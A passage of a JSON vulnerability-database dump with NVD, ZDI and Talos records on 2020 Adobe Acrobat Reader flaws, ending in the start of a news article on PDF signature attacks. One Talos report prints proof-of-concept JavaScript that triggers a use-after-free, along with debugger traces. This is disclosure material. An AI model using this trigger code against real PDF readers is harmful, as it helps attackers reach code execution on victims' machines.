"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24435", "cwe": ["CWE-122"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24435"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24435", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:35", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.7, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24428", "cwe": ["CWE-367"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24428"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24428", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:40", "description": "Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24433", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24433"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24433", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}], "zdi": [{"lastseen": "2022-01-31T21:57:05", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AVDocumentLocal object. By performing actions in JavaScript, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "zdi", "title": "Adobe Acrobat Reader DC AVDocumentLocal Use-After-Free Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24438"], "modified": "2020-11-10T00:00:00", "id": "ZDI-20-1357", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1357/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:57:05", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the exporting of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "zdi", "title": "Adobe Acrobat Pro DC PDF Export Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24434"], "modified": "2020-11-10T00:00:00", "id": "ZDI-20-1356", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1356/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:57:05", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the ID parameter in the PDF trailer. By performing actions in JavaScript, an attacker can disclose the base address of AcroForm.api. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "zdi", "title": "Adobe Acrobat Reader DC ID Parameter Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24426"], "modified": "2020-11-10T00:00:00", "id": "ZDI-20-1354", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1354/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:57:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the exporting of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "zdi", "title": "Adobe Acrobat Pro DC PDF Export Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24436"], "modified": "2020-11-10T00:00:00", "id": "ZDI-20-1355", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1355/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talos": [{"lastseen": "2022-01-26T11:43:13", "description": "### Summary\n\nA specific JavaScript code embedded in a PDF file can trigger a use-after-free vulnerability when opening a PDF document in Adobe Acrobat Reader DC 2020.012.20043. With careful memory manipulation, this can lead to arbitrary code execution. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader 2020.012.20043\n\n### Product URLs\n\n<https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416 - Use After Free\n\n### Details\n\nAdobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface. Javascript allows manipulation of form fields and other page content in a PDF document.\n\nThere exists a vulnerability in a way Adobe Reader is processing `Format` event actions attached to form fields. \nFollowing proof of concept code can be used to trigger this vulenrability:\n \n \n app.activeDocs[0].createTemplate(\"a\"); \n app.activeDocs[0].getField('txt2').setAction(\"Format\",'app.activeDocs[0].deletePages(2);'); \n app.activeDocs[0].spawnPageFromTemplate(\"a\"); \n app.activeDocs[0].spawnPageFromTemplate(\"a\"); \n app.activeDocs[0].resetForm();\n \n\nIn the above code, a template based on the existing document is created. Then, an event handler is attached to `Format` event of a text field present on the page. Further, two additional pages are created based on the template and finally all the forms on the document are reset. Reseting in turn triggers the `Format` event and attached code is executed inside the event handler for field `txt2`. Inside the event handler, pages are deleted which frees the memory associated with text field object, but a stale reference to an object is kept. Still inside the event handler, this stale reference is reused resulting in a use-after-free condition. This can be observed inside a debugger by placing two breakpoints and adding debug alerts inside the proof of concept code allowing us to easily break the execution right before and after the object in question is freed and reused. Breakpoints inside `AcroForm.api` DLL are:\n \n \n bp AcroForm!DllUnregisterServer+0xd01e0\n bp AcroForm!DllUnregisterServer+0xd0255\n \n\nFirst breakpoint is hit at the entry point of a function where our object is pointed to by `ecx`:\n \n \n Breakpoint 1 hit\n eax=0cbcaca8 ebx=00000000 ecx=3744afa0 edx=00000100 esi=65e56540 edi=3744afa0\n eip=65e56540 esp=004fb2f8 ebp=004fb374 iopl=0 nv up ei pl zr na pe cy\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000247\n AcroForm!DllUnregisterServer+0xd01e0:\n 65e56540 6a24 push 24h\n 0:000> dd ecx\n 3744afa0 662c928c 47936fb0 c0010000 0000001b\n 3744afb0 43b12ff8 43b12ffc 43b12ffc 00000000\n 3744afc0 4a48afe8 00000000 00000000 00000000\n 3744afd0 00000000 43b10fe8 00000000 00000000\n 3744afe0 662a8638 00000000 00000000 ffffffff\n 3744aff0 00000000 00000000 00000000 00000000\n 3744b000 ???????? ???????? ???????? ????????\n 3744b010 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a ecx\n address 3744afa0 found in\n _DPH_HEAP_ROOT @ 671000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 374e05e4: 3744afa0 60 - 3744a000 2000\n ? AcroForm!DllUnregisterServer+542f2c\n 6bfbabb0 verifier!AVrfDebugPageHeapAllocate+0x00000240\n 7765245b ntdll!RtlDebugAllocateHeap+0x00000039\n 775b6dd9 ntdll!RtlpAllocateHeap+0x000000f9\n 775b5ec9 ntdll!RtlpAllocateHeapInternal+0x00000179\n 775b5d3e ntdll!RtlAllocateHeap+0x0000003e\n 769c1406 ucrtbase!_malloc_base+0x00000026\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.dll - \n 62e04299 AcroRd32!AcroWinMainSandbox+0x00004c89\n 65b20db9 AcroForm!PlugInMain+0x00000a39\n \n\nFrom the above output, we can see parts of its contents as well as memory allocation information. Continuing execution , until after `deletePages` is executed allows us to inspect the memory after the object is freed:\n \n \n 0:000> g\n ModLoad: 67ab0000 67b3e000 C:\\WINDOWS\\SysWOW64\\mscms.dll\n ModLoad: 685a0000 685ac000 C:\\WINDOWS\\SysWOW64\\ColorAdapterClient.dll\n ModLoad: 68530000 6855c000 C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Updater.api\n ModLoad: 6d010000 6d04d000 C:\\WINDOWS\\SysWOW64\\edputil.dll\n ModLoad: 6cb80000 6cc0b000 C:\\Windows\\SysWOW64\\Windows.StateRepositoryPS.dll\n onecoreuap\\inetcore\\urlmon\\zones\\zoneidentifier.cxx(359)\\urlmon.dll!703A07C9: (caller: 703A0258) ReturnHr(1) tid(1a40) 80070002 The system cannot find the file specified.\n ModLoad: 6cb60000 6cb7a000 C:\\WINDOWS\\SysWOW64\\CLDAPI.dll\n ModLoad: 68520000 68530000 C:\\WINDOWS\\SysWOW64\\pcacli.dll\n ModLoad: 68510000 68520000 C:\\WINDOWS\\SysWOW64\\sfc_os.dll\n ModLoad: 761c0000 765eb000 C:\\WINDOWS\\SysWOW64\\SETUPAPI.dll\n (a2c.c5c): Break instruction exception - code 80000003 (first chance)\n eax=00313000 ebx=00000000 ecx=776142f0 edx=40220080 esi=776142f0 edi=776142f0\n eip=775dcbd0 esp=508ffc90 ebp=508ffcbc iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n ntdll!DbgBreakPoint:\n 775dcbd0 cc int 3\n 0:016> dd 3744afa0 \n 3744afa0 ???????? ???????? ???????? ????????\n 3744afb0 ???????? ???????? ???????? ????????\n 3744afc0 ???????? ???????? ???????? ????????\n 3744afd0 ???????? ???????? ???????? ????????\n 3744afe0 ???????? ???????? ???????? ????????\n 3744aff0 ???????? ???????? ???????? ????????\n 3744b000 ???????? ???????? ???????? ????????\n 3744b010 ???????? ???????? ???????? ????????\n 0:016> !heap -p -a 3744afa0 \n address 3744afa0 found in\n _DPH_HEAP_ROOT @ 671000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 374e05e4: 3744a000 2000\n 6bfbae02 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77652c91 ntdll!RtlDebugFreeHeap+0x0000003e\n 775b3c45 ntdll!RtlpFreeHeap+0x000000d5\n 775b3812 ntdll!RtlFreeHeap+0x00000222\n 769bf43b ucrtbase!_free_base+0x0000001b\n 769bf408 ucrtbase!free+0x00000018\n 62e07839 AcroRd32!AcroWinMainSandbox+0x00008229\n 62e3a416 AcroRd32!CTJPEGLibInit+0x000122a6\n 62e3a45c AcroRd32!CTJPEGLibInit+0x000122ec\n 62ead21c AcroRd32!DllCanUnloadNow+0x000592ec\n 62e78167 AcroRd32!DllCanUnloadNow+0x00024237\n 62e780e8 AcroRd32!DllCanUnloadNow+0x000241b8\n 62eaac09 AcroRd32!DllCanUnloadNow+0x00056cd9\n 62eaabcd AcroRd32!DllCanUnloadNow+0x00056c9d\n \n\nIn the above output, we break Javascript execution while stopped on an `app.alert` window called from inside the `Format` action handler. We inspect the same piece of memory and we can see that it has been freed. Simply continuing execution brings us to one point of reuse which leads to a crash:\n \n \n 0:016> g\n Breakpoint 0 hit\n eax=3fb16fe8 ebx=00000000 ecx=65e7a9db edx=01000000 esi=3fb16fe8 edi=3744afa0\n eip=65e565b5 esp=004fb2b4 ebp=004fb2f4 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n AcroForm!DllUnregisterServer+0xd0255:\n 65e565b5 8b4f14 mov ecx,dword ptr [edi+14h] ds:002b:3744afb4=????????\n 0:000> dd edi\n 3744afa0 ???????? ???????? ???????? ????????\n 3744afb0 ???????? ???????? ???????? ????????\n 3744afc0 ???????? ???????? ???????? ????????\n 3744afd0 ???????? ???????? ???????? ????????\n 3744afe0 ???????? ???????? ???????? ????????\n 3744aff0 ???????? ???????? ???????? ????????\n 3744b000 ???????? ???????? ???????? ????????\n 3744b010 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a edi\n address 3744afa0 found in\n _DPH_HEAP_ROOT @ 671000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 374e05e4: 3744a000 2000\n 6bfbae02 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77652c91 ntdll!RtlDebugFreeHeap+0x0000003e\n 775b3c45 ntdll!RtlpFreeHeap+0x000000d5\n 775b3812 ntdll!RtlFreeHeap+0x00000222\n 769bf43b ucrtbase!_free_base+0x0000001b\n 769bf408 ucrtbase!free+0x00000018\n 62e07839 AcroRd32!AcroWinMainSandbox+0x00008229\n 62e3a416 AcroRd32!CTJPEGLibInit+0x000122a6\n 62e3a45c AcroRd32!CTJPEGLibInit+0x000122ec\n 62ead21c AcroRd32!DllCanUnloadNow+0x000592ec\n \n\nOur second breakpoint is at the crashing instruction where we can see an attempt to access the memory of the previously freed object. First, this demonstrates that we control the point at which the object is freed. Second, that we can execute javascript code after the object is freed, allowing us to take control of the freed memory. And third, we have further control over how the object is reused. Above crash can be observed with PageHeap enabled.\n\nWith careful memory manipulation between the time of free and reuse, control over reused memory can be gained which can lead to arbitrary code execution.\n\n### Timeline\n\n2020-09-24 - Vendor Disclosure \n2020-11-05 - Public Release\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "talos", "title": "Adobe Acrobat Reader DC form field format use after free", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24437"], "modified": "2020-11-05T00:00:00", "id": "TALOS-2020-1156", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1156", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:43:13", "description": "### Summary\n\nA specific JavaScript code embedded in a PDF file can lead to out of bounds memory access when opening a PDF document in Adobe Acrobat Reader DC, version 2020.012.20043. With careful memory manipulation, this can lead to the disclosure of sensitive information, as well as memory corruption, which can lead to arbitrary code execution. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader 2020.012.20043\n\n### Product URLs\n\n<https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-122 - Heap-based Buffer Overflow\n\n### Details\n\nAdobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface.\n\nWhen testing a newer version of Adobe Acrobat Reader, it was discovered that we were able to reproduce a previously patched vulnerability again.\n\nNamely, a heap buffer overflow vulnerability, TALOS-2020-1031, was disclosed to Adobe and patched in an update on the fifth of April. Details of the vulnerability remain the same.\n\n### Timeline\n\n2020-09-24 - Vendor Disclosure \n2020-11-05 - Public Release\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "talos", "title": "Adobe Acrobat Reader DC JavaScript submitForm heap buffer overflow redux", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24435"], "modified": "2020-11-05T00:00:00", "id": "TALOS-2020-1157", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1157", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-vEt5ppBEkBs/YLH7Q8eX-nI/AAAAAAAACr4/ingj3bckY2URSfn8gDwqGnt5E28k26m2gCLcBGAsYHQ/s0/pdf-hacking.jpg>)\n\nCybersecurity researchers have disclosed two new attack techniques on certified PDF documents that could potentially enable an attacker to alter a document's visible content by displaying malicious content over the certi\ufb01ed content without invalidating its signature.\n\n\"The attack idea exploits the flexibility of PDF certification, which allows signing or adding annotations to certified documents under different permission levels,\" [said](<https://web-in-security.blogspot.com/2021/05/attacks-on-pdf-certification.html>) researchers from Ruhr-University Bochum, who have [systematically](<https://thenextweb.com/security/2019/10/02/pdf-flaw-lets-hackers-read-password-protected-documents-researchers-say/>) [analyzed](<https://thehackernews.com/2021/02/shadow-attacks-let-attackers-replace.html>) the security of the PDF specification over the years.\n\nThe findings were presented at the 42nd IEEE Symposium on Security and Privacy ([IEEE S&amp;P 2021](<https://www.ieee-security.org/TC/SP2021/>)) held this week.\n\nThe two attacks \u2014 dubbed [Evil Annotation and Sneaky Signature attacks](<https://pdf-insecurity.org/signature/certification.html>) \u2014 hinge on manipulating the PDF certification process by exploiting flaws in the specification that governs the implementation of digital signatures (aka approval signature) and its more flexible variant 